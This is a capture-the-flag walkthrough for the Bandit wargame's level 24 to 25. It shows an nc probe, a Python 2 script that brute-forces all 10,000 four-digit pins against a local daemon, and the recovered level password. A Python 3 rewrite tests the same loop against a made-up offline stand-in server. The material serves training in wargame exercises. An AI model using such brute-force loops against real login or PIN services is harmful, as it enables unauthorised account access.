Bandit24 - bandit25

From JaxHax

Level Goal

A daemon is listening on port 30002 and will give you the password for bandit25 if given the password for bandit24 and a secret numeric 4-digit pincode. There is no way to retrieve the pincode except by going through all of the 10000 combinations, called brute-forcing.


Solution

Ahh... A simple brute force challenge. Since 10,000 guesses is far too many to type by hand, we will need a script, so first set up a working folder under /tmp (the home directory is owned by root and not writable).

bandit24@melinda:~$ ls -la
total 20
drwxr-xr-x   2 root root 4096 Nov 15 14:55 .
drwxr-xr-x 167 root root 4096 Mar 21 06:46 ..
-rw-r--r--   1 root root  220 Apr  9  2014 .bash_logout
-rw-r--r--   1 root root 3637 Apr  9  2014 .bashrc
-rw-r--r--   1 root root  675 Apr  9  2014 .profile

bandit24@melinda:~$ mkdir /tmp/brutez/

bandit24@melinda:~$ cd /tmp/brutez/


Now let's just test out how the server works.

bandit24@melinda:/tmp/brutez$ nc localhost 30002
I am the pincode checker for user bandit25. Please enter the password for user bandit24 and the secret pincode on a single line, separated by a space.
a
Fail! You did not supply enough data. Try again.
UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ0001
Fail! You did not supply enough data. Try again.
UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ 0001
Wrong! Please enter the correct pincode. Try again.


So now we have our fail string ("Wrong!"). Let's make ourselves a script that tries every pin and reports the first reply that does not contain that error message. I chose to write this as a Python 2 script called brute_em.py in the tmp directory:

import socket

# Python 2 script (print statement, xrange). The known bandit24 password
# is sent in front of every pin guess.
passwd = "UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ"

print " [*] Connecting to 127.0.0.1:30002..."
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('127.0.0.1', 30002))

# Read and discard the banner so it is not mistaken for a reply
buf = s.recv(1024)

print " [*] Launching Brute force loop..."
# xrange's upper bound is exclusive, so 10000 covers 0000 through 9999
# (the original loop stopped at 9998 and would have missed pin 9999)
for i in xrange(0, 10000):
   s.sendall(passwd + " " + str(i).zfill(4) + "\n")
   buf = s.recv(1024)
   # Any reply other than the known "Wrong!" line is worth reporting
   if buf.find("Wrong!") == -1:
      print " [*] Pin " + str(i) + " returned: " + buf
      break

print " [*] Closing Socket...\n"
s.close()


This script tries all 10,000 possible combinations over a single connection and reports the first reply that is not the "Wrong!" message. Let's give it a shot.

bandit24@melinda:/tmp/brutez$ python brute_em.py 
 [*] Connecting to 127.0.0.1:30002...
 [*] Launching Brute force loop...
 [*] Pin 5669 returned: Correct!
The password of user bandit25 is uNG9O58gUE7snukf3bvZ0rxhtnjzSGzG

 [*] Closing Socket...
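For anyone doing this level with Python 3 (the script above is Python 2), here is an added example that is not from the original page: the same line-based brute force written as a function, paired with a small constructed stand-in for the pincode checker so the whole thing runs offline and can be tested. The password, pin, bandit25 secret and port in it are made-up assumptions for the demo; against the real daemon you would drop the stand-in and call brute_force("127.0.0.1", 30002, <real bandit24 password>).

```python
import socket
import threading

# Constructed stand-in for the pincode checker so the example runs offline.
# These values are assumptions for the demo, not the real level's secrets.
PASSWORD = "example-bandit24-password"
PIN = "5669"
SECRET = "example-bandit25-password"
BANNER = ("I am the pincode checker for user bandit25. Please enter the "
          "password for user bandit24 and the secret pincode on a single "
          "line, separated by a space.\n")


def fake_checker(listener):
    """Serve one client, mimicking the replies seen in the nc session above."""
    conn, _ = listener.accept()
    with conn, conn.makefile("r") as reader:
        conn.sendall(BANNER.encode())
        for line in reader:
            parts = line.split()
            if len(parts) != 2:
                conn.sendall(b"Fail! You did not supply enough data. Try again.\n")
            elif parts != [PASSWORD, PIN]:
                conn.sendall(b"Wrong! Please enter the correct pincode. Try again.\n")
            else:
                conn.sendall(b"Correct!\nThe password of user bandit25 is "
                             + SECRET.encode() + b"\n")
                return


def brute_force(host, port, password):
    """Try pins 0000-9999 over one connection; return (pin, reply) or None."""
    with socket.create_connection((host, port)) as s, s.makefile("r") as reader:
        reader.readline()  # swallow the banner so it is not taken for a reply
        for pin in range(10000):
            s.sendall(f"{password} {pin:04d}\n".encode())
            # readline() instead of recv(): one reply line per guess, so a
            # late or split packet cannot desynchronise guess and answer
            reply = reader.readline().strip()
            if reply.startswith("Wrong!"):
                continue
            if reply.startswith("Correct!"):
                # the next level's password follows on its own line
                reply += " " + reader.readline().strip()
            # anything else (e.g. "" when the daemon closed on us) is also
            # returned so the caller sees what changed instead of hanging
            return pin, reply
    return None


def run_demo():
    """Start the stand-in checker on a free local port and brute-force it."""
    listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    listener.bind(("127.0.0.1", 0))
    listener.listen(1)
    port = listener.getsockname()[1]
    server = threading.Thread(target=fake_checker, args=(listener,), daemon=True)
    server.start()
    try:
        return brute_force("127.0.0.1", port, PASSWORD)
    finally:
        server.join(5)
        listener.close()


if __name__ == "__main__":
    hit = run_demo()
    if hit is None:
        print("no pin accepted")
    else:
        print(f"pin {hit[0]:04d} -> {hit[1]}")
```

Like the original script this keeps one connection open for all guesses, which is what the nc session showed the daemon allowing. If a checker instead drops the connection after each wrong answer, readline() returns an empty string and brute_force hands that back immediately; the fix in that case is to reconnect per guess inside the loop rather than to loop harder.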